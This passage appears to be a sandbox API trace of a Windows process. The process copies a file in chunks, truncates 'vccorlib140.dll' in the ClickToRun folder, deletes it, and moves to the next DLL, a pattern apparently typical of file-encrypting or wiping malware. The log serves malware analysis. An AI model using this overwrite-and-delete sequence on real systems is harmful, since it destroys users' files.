[0098.429] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.429] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.429] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.429] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.430] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.430] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.430] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.430] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.430] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.430] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.431] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.431] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.431] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.431] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.431] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.431] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.431] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.432] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.432] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.432] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.432] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.432] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.432] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.432] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.434] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.434] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.434] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.434] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.434] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.434] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.434] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.435] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.435] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.435] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.435] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.435] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.435] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.436] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.437] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.437] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.437] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.437] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.438] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.438] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.438] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.438] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.438] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.438] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.438] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x4b0, lpOverlapped=0x0) returned 1 [0098.438] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.439] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0098.439] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327ef70*=0x4b0, lpOverlapped=0x0) returned 1 [0098.439] CloseHandle (hObject=0x368) returned 1 [0098.439] CloseHandle (hObject=0x418) returned 1 [0098.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.443] GetFileType (hFile=0x418) returned 0x1 [0098.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0098.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0098.444] GetLastError () returned 0xb7 [0098.444] SetLastError (dwErrCode=0xb7) [0098.444] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0098.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0098.445] CloseHandle (hObject=0x418) returned 1 [0098.445] AreFileApisANSI () returned 1 [0098.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0098.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x851c0 [0098.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0098.445] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll")) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0098.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.447] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x1, dwReserved1=0x0, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0098.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0098.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.448] AreFileApisANSI () returned 1 [0098.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll", lpUsedDefaultChar=0x0) returned 75 [0098.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0098.448] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 